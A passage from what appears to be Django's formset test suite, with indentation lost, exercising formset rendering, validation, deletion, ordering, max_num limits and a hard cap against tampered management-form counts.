formset = self.make_choiceformset(initial=initial)
form_output = []
for form in formset.forms:
form_output.append(form.as_ul())
self.assertHTMLEqual('\n'.join(form_output), """<li>Choice: <input type="text" name="choices-0-choice" value="Calexico" /></li>
<li>Votes: <input type="number" name="choices-0-votes" value="100" /></li>
<li>Choice: <input type="text" name="choices-1-choice" /></li>
<li>Votes: <input type="number" name="choices-1-votes" /></li>""")
# Let's simulate what would happen if we submitted this form.
formset = self.make_choiceformset([('Calexico', '100'), ('', '')], initial_forms=1)
self.assertTrue(formset.is_valid())
self.assertEqual([form.cleaned_data for form in formset.forms], [{'votes': 100, 'choice': 'Calexico'}, {}])
def test_second_form_partially_filled(self):
# But the second form was blank! Shouldn't we get some errors? No. If we display
# a form as blank, it's ok for it to be submitted as blank. If we fill out even
# one of the fields of a blank form though, it will be validated. We may want to
# required that at least x number of forms are completed, but we'll show how to
# handle that later.
formset = self.make_choiceformset([('Calexico', '100'), ('The Decemberists', '')], initial_forms=1)
self.assertFalse(formset.is_valid())
self.assertEqual(formset.errors, [{}, {'votes': ['This field is required.']}])
def test_delete_prefilled_data(self):
# If we delete data that was pre-filled, we should get an error. Simply removing
# data from form fields isn't the proper way to delete it. We'll see how to
# handle that case later.
formset = self.make_choiceformset([('', ''), ('', '')], initial_forms=1)
self.assertFalse(formset.is_valid())
self.assertEqual(formset.errors, [{'votes': ['This field is required.'], 'choice': ['This field is required.']}, {}])
def test_displaying_more_than_one_blank_form(self):
# Displaying more than 1 blank form ###########################################
# We can also display more than 1 empty form at a time. To do so, pass a
# extra argument to formset_factory.
ChoiceFormSet = formset_factory(Choice, extra=3)
formset = ChoiceFormSet(auto_id=False, prefix='choices')
form_output = []
for form in formset.forms:
form_output.append(form.as_ul())
self.assertHTMLEqual('\n'.join(form_output), """<li>Choice: <input type="text" name="choices-0-choice" /></li>
<li>Votes: <input type="number" name="choices-0-votes" /></li>
<li>Choice: <input type="text" name="choices-1-choice" /></li>
<li>Votes: <input type="number" name="choices-1-votes" /></li>
<li>Choice: <input type="text" name="choices-2-choice" /></li>
<li>Votes: <input type="number" name="choices-2-votes" /></li>""")
# Since we displayed every form as blank, we will also accept them back as blank.
# This may seem a little strange, but later we will show how to require a minimum
# number of forms to be completed.
data = {
'choices-TOTAL_FORMS': '3', # the number of forms rendered
'choices-INITIAL_FORMS': '0', # the number of forms with initial data
'choices-MAX_NUM_FORMS': '0', # max number of forms
'choices-0-choice': '',
'choices-0-votes': '',
'choices-1-choice': '',
'choices-1-votes': '',
'choices-2-choice': '',
'choices-2-votes': '',
}
formset = ChoiceFormSet(data, auto_id=False, prefix='choices')
self.assertTrue(formset.is_valid())
self.assertEqual([form.cleaned_data for form in formset.forms], [{}, {}, {}])
def test_single_form_completed(self):
# We can just fill out one of the forms.
data = {
'choices-TOTAL_FORMS': '3', # the number of forms rendered
'choices-INITIAL_FORMS': '0', # the number of forms with initial data
'choices-MAX_NUM_FORMS': '0', # max number of forms
'choices-0-choice': 'Calexico',
'choices-0-votes': '100',
'choices-1-choice': '',
'choices-1-votes': '',
'choices-2-choice': '',
'choices-2-votes': '',
}
ChoiceFormSet = formset_factory(Choice, extra=3)
formset = ChoiceFormSet(data, auto_id=False, prefix='choices')
self.assertTrue(formset.is_valid())
self.assertEqual([form.cleaned_data for form in formset.forms], [{'votes': 100, 'choice': 'Calexico'}, {}, {}])
def test_formset_validate_max_flag(self):
# If validate_max is set and max_num is less than TOTAL_FORMS in the
# data, then throw an exception. MAX_NUM_FORMS in the data is
# irrelevant here (it's output as a hint for the client but its
# value in the returned data is not checked)
data = {
'choices-TOTAL_FORMS': '2', # the number of forms rendered
'choices-INITIAL_FORMS': '0', # the number of forms with initial data
'choices-MAX_NUM_FORMS': '2', # max number of forms - should be ignored
'choices-0-choice': 'Zero',
'choices-0-votes': '0',
'choices-1-choice': 'One',
'choices-1-votes': '1',
}
ChoiceFormSet = formset_factory(Choice, extra=1, max_num=1, validate_max=True)
formset = ChoiceFormSet(data, auto_id=False, prefix='choices')
self.assertFalse(formset.is_valid())
self.assertEqual(formset.non_form_errors(), ['Please submit 1 or fewer forms.'])
def test_second_form_partially_filled_2(self):
# And once again, if we try to partially complete a form, validation will fail.
data = {
'choices-TOTAL_FORMS': '3', # the number of forms rendered
'choices-INITIAL_FORMS': '0', # the number of forms with initial data
'choices-MAX_NUM_FORMS': '0', # max number of forms
'choices-0-choice': 'Calexico',
'choices-0-votes': '100',
'choices-1-choice': 'The Decemberists',
'choices-1-votes': '', # missing value
'choices-2-choice': '',
'choices-2-votes': '',
}
ChoiceFormSet = formset_factory(Choice, extra=3)
formset = ChoiceFormSet(data, auto_id=False, prefix='choices')
self.assertFalse(formset.is_valid())
self.assertEqual(formset.errors, [{}, {'votes': ['This field is required.']}, {}])
def test_more_initial_data(self):
# The extra argument also works when the formset is pre-filled with initial
# data.
data = {
'choices-TOTAL_FORMS': '3', # the number of forms rendered
'choices-INITIAL_FORMS': '0', # the number of forms with initial data
'choices-MAX_NUM_FORMS': '0', # max number of forms
'choices-0-choice': 'Calexico',
'choices-0-votes': '100',
'choices-1-choice': '',
'choices-1-votes': '', # missing value
'choices-2-choice': '',
'choices-2-votes': '',
}
initial = [{'choice': 'Calexico', 'votes': 100}]
ChoiceFormSet = formset_factory(Choice, extra=3)
formset = ChoiceFormSet(initial=initial, auto_id=False, prefix='choices')
form_output = []
for form in formset.forms:
form_output.append(form.as_ul())
self.assertHTMLEqual('\n'.join(form_output), """<li>Choice: <input type="text" name="choices-0-choice" value="Calexico" /></li>
<li>Votes: <input type="number" name="choices-0-votes" value="100" /></li>
<li>Choice: <input type="text" name="choices-1-choice" /></li>
<li>Votes: <input type="number" name="choices-1-votes" /></li>
<li>Choice: <input type="text" name="choices-2-choice" /></li>
<li>Votes: <input type="number" name="choices-2-votes" /></li>
<li>Choice: <input type="text" name="choices-3-choice" /></li>
<li>Votes: <input type="number" name="choices-3-votes" /></li>""")
# Make sure retrieving an empty form works, and it shows up in the form list
self.assertTrue(formset.empty_form.empty_permitted)
self.assertHTMLEqual(formset.empty_form.as_ul(), """<li>Choice: <input type="text" name="choices-__prefix__-choice" /></li>
<li>Votes: <input type="number" name="choices-__prefix__-votes" /></li>""")
def test_formset_with_deletion(self):
# FormSets with deletion ######################################################
# We can easily add deletion ability to a FormSet with an argument to
# formset_factory. This will add a boolean field to each form instance. When
# that boolean field is True, the form will be in formset.deleted_forms
ChoiceFormSet = formset_factory(Choice, can_delete=True)
initial = [{'choice': 'Calexico', 'votes': 100}, {'choice': 'Fergie', 'votes': 900}]
formset = ChoiceFormSet(initial=initial, auto_id=False, prefix='choices')
form_output = []
for form in formset.forms:
form_output.append(form.as_ul())
self.assertHTMLEqual('\n'.join(form_output), """<li>Choice: <input type="text" name="choices-0-choice" value="Calexico" /></li>
<li>Votes: <input type="number" name="choices-0-votes" value="100" /></li>
<li>Delete: <input type="checkbox" name="choices-0-DELETE" /></li>
<li>Choice: <input type="text" name="choices-1-choice" value="Fergie" /></li>
<li>Votes: <input type="number" name="choices-1-votes" value="900" /></li>
<li>Delete: <input type="checkbox" name="choices-1-DELETE" /></li>
<li>Choice: <input type="text" name="choices-2-choice" /></li>
<li>Votes: <input type="number" name="choices-2-votes" /></li>
<li>Delete: <input type="checkbox" name="choices-2-DELETE" /></li>""")
# To delete something, we just need to set that form's special delete field to
# 'on'. Let's go ahead and delete Fergie.
data = {
'choices-TOTAL_FORMS': '3', # the number of forms rendered
'choices-INITIAL_FORMS': '2', # the number of forms with initial data
'choices-MAX_NUM_FORMS': '0', # max number of forms
'choices-0-choice': 'Calexico',
'choices-0-votes': '100',
'choices-0-DELETE': '',
'choices-1-choice': 'Fergie',
'choices-1-votes': '900',
'choices-1-DELETE': 'on',
'choices-2-choice': '',
'choices-2-votes': '',
'choices-2-DELETE': '',
}
formset = ChoiceFormSet(data, auto_id=False, prefix='choices')
self.assertTrue(formset.is_valid())
self.assertEqual([form.cleaned_data for form in formset.forms], [{'votes': 100, 'DELETE': False, 'choice': 'Calexico'}, {'votes': 900, 'DELETE': True, 'choice': 'Fergie'}, {}])
self.assertEqual([form.cleaned_data for form in formset.deleted_forms], [{'votes': 900, 'DELETE': True, 'choice': 'Fergie'}])
# If we fill a form with something and then we check the can_delete checkbox for
# that form, that form's errors should not make the entire formset invalid since
# it's going to be deleted.
class CheckForm(Form):
field = IntegerField(min_value=100)
data = {
'check-TOTAL_FORMS': '3', # the number of forms rendered
'check-INITIAL_FORMS': '2', # the number of forms with initial data
'check-MAX_NUM_FORMS': '0', # max number of forms
'check-0-field': '200',
'check-0-DELETE': '',
'check-1-field': '50',
'check-1-DELETE': 'on',
'check-2-field': '',
'check-2-DELETE': '',
}
CheckFormSet = formset_factory(CheckForm, can_delete=True)
formset = CheckFormSet(data, prefix='check')
self.assertTrue(formset.is_valid())
# If we remove the deletion flag now we will have our validation back.
data['check-1-DELETE'] = ''
formset = CheckFormSet(data, prefix='check')
self.assertFalse(formset.is_valid())
# Should be able to get deleted_forms from a valid formset even if a
# deleted form would have been invalid.
class Person(Form):
name = CharField()
PeopleForm = formset_factory(
form=Person,
can_delete=True)
p = PeopleForm(
{'form-0-name': '', 'form-0-DELETE': 'on', # no name!
'form-TOTAL_FORMS': 1, 'form-INITIAL_FORMS': 1,
'form-MAX_NUM_FORMS': 1})
self.assertTrue(p.is_valid())
self.assertEqual(len(p.deleted_forms), 1)
def test_formsets_with_ordering(self):
# FormSets with ordering ######################################################
# We can also add ordering ability to a FormSet with an argument to
# formset_factory. This will add a integer field to each form instance. When
# form validation succeeds, [form.cleaned_data for form in formset.forms] will have the data in the correct
# order specified by the ordering fields. If a number is duplicated in the set
# of ordering fields, for instance form 0 and form 3 are both marked as 1, then
# the form index used as a secondary ordering criteria. In order to put
# something at the front of the list, you'd need to set it's order to 0.
ChoiceFormSet = formset_factory(Choice, can_order=True)
initial = [{'choice': 'Calexico', 'votes': 100}, {'choice': 'Fergie', 'votes': 900}]
formset = ChoiceFormSet(initial=initial, auto_id=False, prefix='choices')
form_output = []
for form in formset.forms:
form_output.append(form.as_ul())
self.assertHTMLEqual('\n'.join(form_output), """<li>Choice: <input type="text" name="choices-0-choice" value="Calexico" /></li>
<li>Votes: <input type="number" name="choices-0-votes" value="100" /></li>
<li>Order: <input type="number" name="choices-0-ORDER" value="1" /></li>
<li>Choice: <input type="text" name="choices-1-choice" value="Fergie" /></li>
<li>Votes: <input type="number" name="choices-1-votes" value="900" /></li>
<li>Order: <input type="number" name="choices-1-ORDER" value="2" /></li>
<li>Choice: <input type="text" name="choices-2-choice" /></li>
<li>Votes: <input type="number" name="choices-2-votes" /></li>
<li>Order: <input type="number" name="choices-2-ORDER" /></li>""")
data = {
'choices-TOTAL_FORMS': '3', # the number of forms rendered
'choices-INITIAL_FORMS': '2', # the number of forms with initial data
'choices-MAX_NUM_FORMS': '0', # max number of forms
'choices-0-choice': 'Calexico',
'choices-0-votes': '100',
'choices-0-ORDER': '1',
'choices-1-choice': 'Fergie',
'choices-1-votes': '900',
'choices-1-ORDER': '2',
'choices-2-choice': 'The Decemberists',
'choices-2-votes': '500',
'choices-2-ORDER': '0',
}
formset = ChoiceFormSet(data, auto_id=False, prefix='choices')
self.assertTrue(formset.is_valid())
form_output = []
for form in formset.ordered_forms:
form_output.append(form.cleaned_data)
self.assertEqual(form_output, [
{'votes': 500, 'ORDER': 0, 'choice': 'The Decemberists'},
{'votes': 100, 'ORDER': 1, 'choice': 'Calexico'},
{'votes': 900, 'ORDER': 2, 'choice': 'Fergie'},
])
def test_empty_ordered_fields(self):
# Ordering fields are allowed to be left blank, and if they *are* left blank,
# they will be sorted below everything else.
data = {
'choices-TOTAL_FORMS': '4', # the number of forms rendered
'choices-INITIAL_FORMS': '3', # the number of forms with initial data
'choices-MAX_NUM_FORMS': '0', # max number of forms
'choices-0-choice': 'Calexico',
'choices-0-votes': '100',
'choices-0-ORDER': '1',
'choices-1-choice': 'Fergie',
'choices-1-votes': '900',
'choices-1-ORDER': '2',
'choices-2-choice': 'The Decemberists',
'choices-2-votes': '500',
'choices-2-ORDER': '',
'choices-3-choice': 'Basia Bulat',
'choices-3-votes': '50',
'choices-3-ORDER': '',
}
ChoiceFormSet = formset_factory(Choice, can_order=True)
formset = ChoiceFormSet(data, auto_id=False, prefix='choices')
self.assertTrue(formset.is_valid())
form_output = []
for form in formset.ordered_forms:
form_output.append(form.cleaned_data)
self.assertEqual(form_output, [
{'votes': 100, 'ORDER': 1, 'choice': 'Calexico'},
{'votes': 900, 'ORDER': 2, 'choice': 'Fergie'},
{'votes': 500, 'ORDER': None, 'choice': 'The Decemberists'},
{'votes': 50, 'ORDER': None, 'choice': 'Basia Bulat'},
])
def test_ordering_blank_fieldsets(self):
# Ordering should work with blank fieldsets.
data = {
'choices-TOTAL_FORMS': '3', # the number of forms rendered
'choices-INITIAL_FORMS': '0', # the number of forms with initial data
'choices-MAX_NUM_FORMS': '0', # max number of forms
}
ChoiceFormSet = formset_factory(Choice, can_order=True)
formset = ChoiceFormSet(data, auto_id=False, prefix='choices')
self.assertTrue(formset.is_valid())
form_output = []
for form in formset.ordered_forms:
form_output.append(form.cleaned_data)
self.assertEqual(form_output, [])
def test_formset_with_ordering_and_deletion(self):
# FormSets with ordering + deletion ###########################################
# Let's try throwing ordering and deletion into the same form.
ChoiceFormSet = formset_factory(Choice, can_order=True, can_delete=True)
initial = [
{'choice': 'Calexico', 'votes': 100},
{'choice': 'Fergie', 'votes': 900},
{'choice': 'The Decemberists', 'votes': 500},
]
formset = ChoiceFormSet(initial=initial, auto_id=False, prefix='choices')
form_output = []
for form in formset.forms:
form_output.append(form.as_ul())
self.assertHTMLEqual('\n'.join(form_output), """<li>Choice: <input type="text" name="choices-0-choice" value="Calexico" /></li>
<li>Votes: <input type="number" name="choices-0-votes" value="100" /></li>
<li>Order: <input type="number" name="choices-0-ORDER" value="1" /></li>
<li>Delete: <input type="checkbox" name="choices-0-DELETE" /></li>
<li>Choice: <input type="text" name="choices-1-choice" value="Fergie" /></li>
<li>Votes: <input type="number" name="choices-1-votes" value="900" /></li>
<li>Order: <input type="number" name="choices-1-ORDER" value="2" /></li>
<li>Delete: <input type="checkbox" name="choices-1-DELETE" /></li>
<li>Choice: <input type="text" name="choices-2-choice" value="The Decemberists" /></li>
<li>Votes: <input type="number" name="choices-2-votes" value="500" /></li>
<li>Order: <input type="number" name="choices-2-ORDER" value="3" /></li>
<li>Delete: <input type="checkbox" name="choices-2-DELETE" /></li>
<li>Choice: <input type="text" name="choices-3-choice" /></li>
<li>Votes: <input type="number" name="choices-3-votes" /></li>
<li>Order: <input type="number" name="choices-3-ORDER" /></li>
<li>Delete: <input type="checkbox" name="choices-3-DELETE" /></li>""")
# Let's delete Fergie, and put The Decemberists ahead of Calexico.
data = {
'choices-TOTAL_FORMS': '4', # the number of forms rendered
'choices-INITIAL_FORMS': '3', # the number of forms with initial data
'choices-MAX_NUM_FORMS': '0', # max number of forms
'choices-0-choice': 'Calexico',
'choices-0-votes': '100',
'choices-0-ORDER': '1',
'choices-0-DELETE': '',
'choices-1-choice': 'Fergie',
'choices-1-votes': '900',
'choices-1-ORDER': '2',
'choices-1-DELETE': 'on',
'choices-2-choice': 'The Decemberists',
'choices-2-votes': '500',
'choices-2-ORDER': '0',
'choices-2-DELETE': '',
'choices-3-choice': '',
'choices-3-votes': '',
'choices-3-ORDER': '',
'choices-3-DELETE': '',
}
formset = ChoiceFormSet(data, auto_id=False, prefix='choices')
self.assertTrue(formset.is_valid())
form_output = []
for form in formset.ordered_forms:
form_output.append(form.cleaned_data)
self.assertEqual(form_output, [
{'votes': 500, 'DELETE': False, 'ORDER': 0, 'choice': 'The Decemberists'},
{'votes': 100, 'DELETE': False, 'ORDER': 1, 'choice': 'Calexico'},
])
self.assertEqual([form.cleaned_data for form in formset.deleted_forms], [{'votes': 900, 'DELETE': True, 'ORDER': 2, 'choice': 'Fergie'}])
def test_invalid_deleted_form_with_ordering(self):
# Should be able to get ordered forms from a valid formset even if a
# deleted form would have been invalid.
class Person(Form):
name = CharField()
PeopleForm = formset_factory(form=Person, can_delete=True, can_order=True)
p = PeopleForm({
'form-0-name': '',
'form-0-DELETE': 'on', # no name!
'form-TOTAL_FORMS': 1,
'form-INITIAL_FORMS': 1,
'form-MAX_NUM_FORMS': 1
})
self.assertTrue(p.is_valid())
self.assertEqual(p.ordered_forms, [])
def test_clean_hook(self):
# FormSet clean hook ##########################################################
# FormSets have a hook for doing extra validation that shouldn't be tied to any
# particular form. It follows the same pattern as the clean hook on Forms.
# We start out with a some duplicate data.
data = {
'drinks-TOTAL_FORMS': '2', # the number of forms rendered
'drinks-INITIAL_FORMS': '0', # the number of forms with initial data
'drinks-MAX_NUM_FORMS': '0', # max number of forms
'drinks-0-name': 'Gin and Tonic',
'drinks-1-name': 'Gin and Tonic',
}
formset = FavoriteDrinksFormSet(data, prefix='drinks')
self.assertFalse(formset.is_valid())
# Any errors raised by formset.clean() are available via the
# formset.non_form_errors() method.
for error in formset.non_form_errors():
self.assertEqual(str(error), 'You may only specify a drink once.')
# Make sure we didn't break the valid case.
data = {
'drinks-TOTAL_FORMS': '2', # the number of forms rendered
'drinks-INITIAL_FORMS': '0', # the number of forms with initial data
'drinks-MAX_NUM_FORMS': '0', # max number of forms
'drinks-0-name': 'Gin and Tonic',
'drinks-1-name': 'Bloody Mary',
}
formset = FavoriteDrinksFormSet(data, prefix='drinks')
self.assertTrue(formset.is_valid())
self.assertEqual(formset.non_form_errors(), [])
def test_limiting_max_forms(self):
# Limiting the maximum number of forms ########################################
# Base case for max_num.
# When not passed, max_num will take a high default value, leaving the
# number of forms only controlled by the value of the extra parameter.
LimitedFavoriteDrinkFormSet = formset_factory(FavoriteDrinkForm, extra=3)
formset = LimitedFavoriteDrinkFormSet()
form_output = []
for form in formset.forms:
form_output.append(str(form))
self.assertHTMLEqual('\n'.join(form_output), """<tr><th><label for="id_form-0-name">Name:</label></th><td><input type="text" name="form-0-name" id="id_form-0-name" /></td></tr>
<tr><th><label for="id_form-1-name">Name:</label></th><td><input type="text" name="form-1-name" id="id_form-1-name" /></td></tr>
<tr><th><label for="id_form-2-name">Name:</label></th><td><input type="text" name="form-2-name" id="id_form-2-name" /></td></tr>""")
# If max_num is 0 then no form is rendered at all.
LimitedFavoriteDrinkFormSet = formset_factory(FavoriteDrinkForm, extra=3, max_num=0)
formset = LimitedFavoriteDrinkFormSet()
form_output = []
for form in formset.forms:
form_output.append(str(form))
self.assertEqual('\n'.join(form_output), "")
LimitedFavoriteDrinkFormSet = formset_factory(FavoriteDrinkForm, extra=5, max_num=2)
formset = LimitedFavoriteDrinkFormSet()
form_output = []
for form in formset.forms:
form_output.append(str(form))
self.assertHTMLEqual('\n'.join(form_output), """<tr><th><label for="id_form-0-name">Name:</label></th><td><input type="text" name="form-0-name" id="id_form-0-name" /></td></tr>
<tr><th><label for="id_form-1-name">Name:</label></th><td><input type="text" name="form-1-name" id="id_form-1-name" /></td></tr>""")
# Ensure that max_num has no effect when extra is less than max_num.
LimitedFavoriteDrinkFormSet = formset_factory(FavoriteDrinkForm, extra=1, max_num=2)
formset = LimitedFavoriteDrinkFormSet()
form_output = []
for form in formset.forms:
form_output.append(str(form))
self.assertHTMLEqual('\n'.join(form_output), """<tr><th><label for="id_form-0-name">Name:</label></th><td><input type="text" name="form-0-name" id="id_form-0-name" /></td></tr>""")
def test_max_num_with_initial_data(self):
# max_num with initial data
# When not passed, max_num will take a high default value, leaving the
# number of forms only controlled by the value of the initial and extra
# parameters.
initial = [
{'name': 'Fernet and Coke'},
]
LimitedFavoriteDrinkFormSet = formset_factory(FavoriteDrinkForm, extra=1)
formset = LimitedFavoriteDrinkFormSet(initial=initial)
form_output = []
for form in formset.forms:
form_output.append(str(form))
self.assertHTMLEqual('\n'.join(form_output), """<tr><th><label for="id_form-0-name">Name:</label></th><td><input type="text" name="form-0-name" value="Fernet and Coke" id="id_form-0-name" /></td></tr>
<tr><th><label for="id_form-1-name">Name:</label></th><td><input type="text" name="form-1-name" id="id_form-1-name" /></td></tr>""")
def test_max_num_zero(self):
# If max_num is 0 then no form is rendered at all, regardless of extra,
# unless initial data is present. (This changed in the patch for bug
# 20084 -- previously max_num=0 trumped initial data)
LimitedFavoriteDrinkFormSet = formset_factory(FavoriteDrinkForm, extra=1, max_num=0)
formset = LimitedFavoriteDrinkFormSet()
form_output = []
for form in formset.forms:
form_output.append(str(form))
self.assertEqual('\n'.join(form_output), "")
# test that initial trumps max_num
initial = [
{'name': 'Fernet and Coke'},
{'name': 'Bloody Mary'},
]
LimitedFavoriteDrinkFormSet = formset_factory(FavoriteDrinkForm, extra=1, max_num=0)
formset = LimitedFavoriteDrinkFormSet(initial=initial)
form_output = []
for form in formset.forms:
form_output.append(str(form))
self.assertEqual('\n'.join(form_output), """<tr><th><label for="id_form-0-name">Name:</label></th><td><input id="id_form-0-name" name="form-0-name" type="text" value="Fernet and Coke" /></td></tr>
<tr><th><label for="id_form-1-name">Name:</label></th><td><input id="id_form-1-name" name="form-1-name" type="text" value="Bloody Mary" /></td></tr>""")
def test_more_initial_than_max_num(self):
# More initial forms than max_num now results in all initial forms
# being displayed (but no extra forms). This behavior was changed
# from max_num taking precedence in the patch for #20084
initial = [
{'name': 'Gin Tonic'},
{'name': 'Bloody Mary'},
{'name': 'Jack and Coke'},
]
LimitedFavoriteDrinkFormSet = formset_factory(FavoriteDrinkForm, extra=1, max_num=2)
formset = LimitedFavoriteDrinkFormSet(initial=initial)
form_output = []
for form in formset.forms:
form_output.append(str(form))
self.assertHTMLEqual('\n'.join(form_output), """<tr><th><label for="id_form-0-name">Name:</label></th><td><input id="id_form-0-name" name="form-0-name" type="text" value="Gin Tonic" /></td></tr>
<tr><th><label for="id_form-1-name">Name:</label></th><td><input id="id_form-1-name" name="form-1-name" type="text" value="Bloody Mary" /></td></tr>
<tr><th><label for="id_form-2-name">Name:</label></th><td><input id="id_form-2-name" name="form-2-name" type="text" value="Jack and Coke" /></td></tr>""")
# One form from initial and extra=3 with max_num=2 should result in the one
# initial form and one extra.
initial = [
{'name': 'Gin Tonic'},
]
LimitedFavoriteDrinkFormSet = formset_factory(FavoriteDrinkForm, extra=3, max_num=2)
formset = LimitedFavoriteDrinkFormSet(initial=initial)
form_output = []
for form in formset.forms:
form_output.append(str(form))
self.assertHTMLEqual('\n'.join(form_output), """<tr><th><label for="id_form-0-name">Name:</label></th><td><input type="text" name="form-0-name" value="Gin Tonic" id="id_form-0-name" /></td></tr>
<tr><th><label for="id_form-1-name">Name:</label></th><td><input type="text" name="form-1-name" id="id_form-1-name" /></td></tr>""")
def test_regression_6926(self):
# Regression test for #6926 ##################################################
# Make sure the management form has the correct prefix.
formset = FavoriteDrinksFormSet()
self.assertEqual(formset.management_form.prefix, 'form')
data = {
'form-TOTAL_FORMS': '2',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '0',
}
formset = FavoriteDrinksFormSet(data=data)
self.assertEqual(formset.management_form.prefix, 'form')
formset = FavoriteDrinksFormSet(initial={})
self.assertEqual(formset.management_form.prefix, 'form')
def test_regression_12878(self):
# Regression test for #12878 #################################################
data = {
'drinks-TOTAL_FORMS': '2', # the number of forms rendered
'drinks-INITIAL_FORMS': '0', # the number of forms with initial data
'drinks-MAX_NUM_FORMS': '0', # max number of forms
'drinks-0-name': 'Gin and Tonic',
'drinks-1-name': 'Gin and Tonic',
}
formset = FavoriteDrinksFormSet(data, prefix='drinks')
self.assertFalse(formset.is_valid())
self.assertEqual(formset.non_form_errors(), ['You may only specify a drink once.'])
def test_formset_iteration(self):
# Regression tests for #16455 -- formset instances are iterable
ChoiceFormset = formset_factory(Choice, extra=3)
formset = ChoiceFormset()
# confirm iterated formset yields formset.forms
forms = list(formset)
self.assertEqual(forms, formset.forms)
self.assertEqual(len(formset), len(forms))
# confirm indexing of formset
self.assertEqual(formset[0], forms[0])
try:
formset[3]
self.fail('Requesting an invalid formset index should raise an exception')
except IndexError:
pass
# Formets can override the default iteration order
class BaseReverseFormSet(BaseFormSet):
def __iter__(self):
return reversed(self.forms)
def __getitem__(self, idx):
return super(BaseReverseFormSet, self).__getitem__(len(self) - idx - 1)
ReverseChoiceFormset = formset_factory(Choice, BaseReverseFormSet, extra=3)
reverse_formset = ReverseChoiceFormset()
# confirm that __iter__ modifies rendering order
# compare forms from "reverse" formset with forms from original formset
self.assertEqual(str(reverse_formset[0]), str(forms[-1]))
self.assertEqual(str(reverse_formset[1]), str(forms[-2]))
self.assertEqual(len(reverse_formset), len(forms))
def test_formset_nonzero(self):
"""
Formsets with no forms should still evaluate as true.
Regression test for #15722
"""
ChoiceFormset = formset_factory(Choice, extra=0)
formset = ChoiceFormset()
self.assertEqual(len(formset.forms), 0)
self.assertTrue(formset)
def test_formset_splitdatetimefield(self):
"""
Formset should also work with SplitDateTimeField(initial=datetime.datetime.now).
Regression test for #18709.
"""
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '0',
'form-0-when_0': '1904-06-16',
'form-0-when_1': '15:51:33',
}
formset = SplitDateTimeFormSet(data)
self.assertTrue(formset.is_valid())
def test_formset_error_class(self):
# Regression tests for #16479 -- formsets form use ErrorList instead of supplied error_class
class CustomErrorList(ErrorList):
pass
formset = FavoriteDrinksFormSet(error_class=CustomErrorList)
self.assertEqual(formset.forms[0].error_class, CustomErrorList)
def test_formset_calls_forms_is_valid(self):
# Regression tests for #18574 -- make sure formsets call
# is_valid() on each form.
class AnotherChoice(Choice):
def is_valid(self):
self.is_valid_called = True
return super(AnotherChoice, self).is_valid()
AnotherChoiceFormSet = formset_factory(AnotherChoice)
data = {
'choices-TOTAL_FORMS': '1', # number of forms rendered
'choices-INITIAL_FORMS': '0', # number of forms with initial data
'choices-MAX_NUM_FORMS': '0', # max number of forms
'choices-0-choice': 'Calexico',
'choices-0-votes': '100',
}
formset = AnotherChoiceFormSet(data, auto_id=False, prefix='choices')
self.assertTrue(formset.is_valid())
self.assertTrue(all([form.is_valid_called for form in formset.forms]))
def test_hard_limit_on_instantiated_forms(self):
"""A formset has a hard limit on the number of forms instantiated."""
# reduce the default limit of 1000 temporarily for testing
_old_DEFAULT_MAX_NUM = formsets.DEFAULT_MAX_NUM
try:
formsets.DEFAULT_MAX_NUM = 2
ChoiceFormSet = formset_factory(Choice, max_num=1)
# someone fiddles with the mgmt form data...
formset = ChoiceFormSet(
{
'choices-TOTAL_FORMS': '4',
'choices-INITIAL_FORMS': '0',
'choices-MAX_NUM_FORMS': '4',
'choices-0-choice': 'Zero',
'choices-0-votes': '0',
'choices-1-choice': 'One',
'choices-1-votes': '1',
'choices-2-choice': 'Two',
'choices-2-votes': '2',
'choices-3-choice': 'Three',
'choices-3-votes': '3',
},
prefix='choices',
)
# But we still only instantiate 3 forms
self.assertEqual(len(formset.forms), 3)
# and the formset isn't valid
self.assertFalse(formset.is_valid())
finally:
formsets.DEFAULT_MAX_NUM = _old_DEFAULT_MAX_NUM
def test_increase_hard_limit(self):
"""Can increase the built-in forms limit via a higher max_num."""
# reduce the default limit of 1000 temporarily for testing
_old_DEFAULT_MAX_NUM = formsets.DEFAULT_MAX_NUM
try:
formsets.DEFAULT_MAX_NUM = 3
# for this form, we want a limit of 4
ChoiceFormSet = formset_factory(Choice, max_num=4)
formset = ChoiceFormSet(
{
'choices-TOTAL_FORMS': '4',
'choices-INITIAL_FORMS': '0',
'choices-MAX_NUM_FORMS': '4',
'choices-0-choice': 'Zero',
'choices-0-votes': '0',
'choices-1-choice': 'One',
'choices-1-votes': '1',
'choices-2-choice': 'Two',
'choices-2-votes': '2',
'choices-3-choice': 'Three',
'choices-3-votes': '3',
},
prefix='choices',
)
# Four forms are instantiated and no exception is raised
self.assertEqual(len(formset.forms), 4)
finally:
formsets.DEFAULT_MAX_NUM = _old_DEFAULT_MAX_NUM
def test_non_form_errors_run_full_clean(self):
# Regression test for #11160
# If non_form_errors() is called without calling is_valid() first,
# it should ensure that full_clean() is called.
class BaseCustomFormSet(BaseFormSet):
def clean(self):
raise ValidationError("This is a non-form error")
ChoiceFormSet = formset_factory(Choice, formset=BaseCustomFormSet)
formset = ChoiceFormSet(data, auto_id=False, prefix='choices')
self.assertIsInstance(formset.non_form_errors(), ErrorList)
self.assertEqual(list(formset.non_form_errors()),
['This is a non-form error'])
def test_validate_max_ignores_forms_marked_for_deletion(self):
class CheckForm(Form):
field = IntegerField()
data = {
'check-TOTAL_FORMS': '2',
'check-INITIAL_FORMS': '0',
'check-MAX_NUM_FORMS': '1',
'check-0-field': '200',
'check-0-DELETE': '',
'check-1-field': '50',
'check-1-DELETE': 'on',
}
CheckFormSet = formset_factory(CheckForm, max_num=1, validate_max=True,
can_delete=True)
formset = CheckFormSet(data, prefix='check')
self.assertTrue(formset.is_valid())
def test_formset_total_error_count(self):
"""A valid formset should have 0 total errors."""
data = [ # formset_data, expected error count
([('Calexico', '100')], 0),
([('Calexico', '')], 1),
([('', 'invalid')], 2),
([('Calexico', '100'), ('Calexico', '')], 1),
([('Calexico', ''), ('Calexico', '')], 2),
]
for formset_data, expected_error_count in data:
formset = self.make_choiceformset(formset_data)
self.assertEqual(formset.total_error_count(), expected_error_count)
def test_formset_total_error_count_with_non_form_errors(self):
data = {
'choices-TOTAL_FORMS': '2', # the number of forms rendered
'choices-INITIAL_FORMS': '0', # the number of forms with initial data
'choices-MAX_NUM_FORMS': '2', # max number of forms - should be ignored
'choices-0-choice': 'Zero',
'choices-0-votes': '0',
'choices-1-choice': 'One',
'choices-1-votes': '1',
}
ChoiceFormSet = formset_factory(Choice, extra=1, max_num=1, validate_max=True)
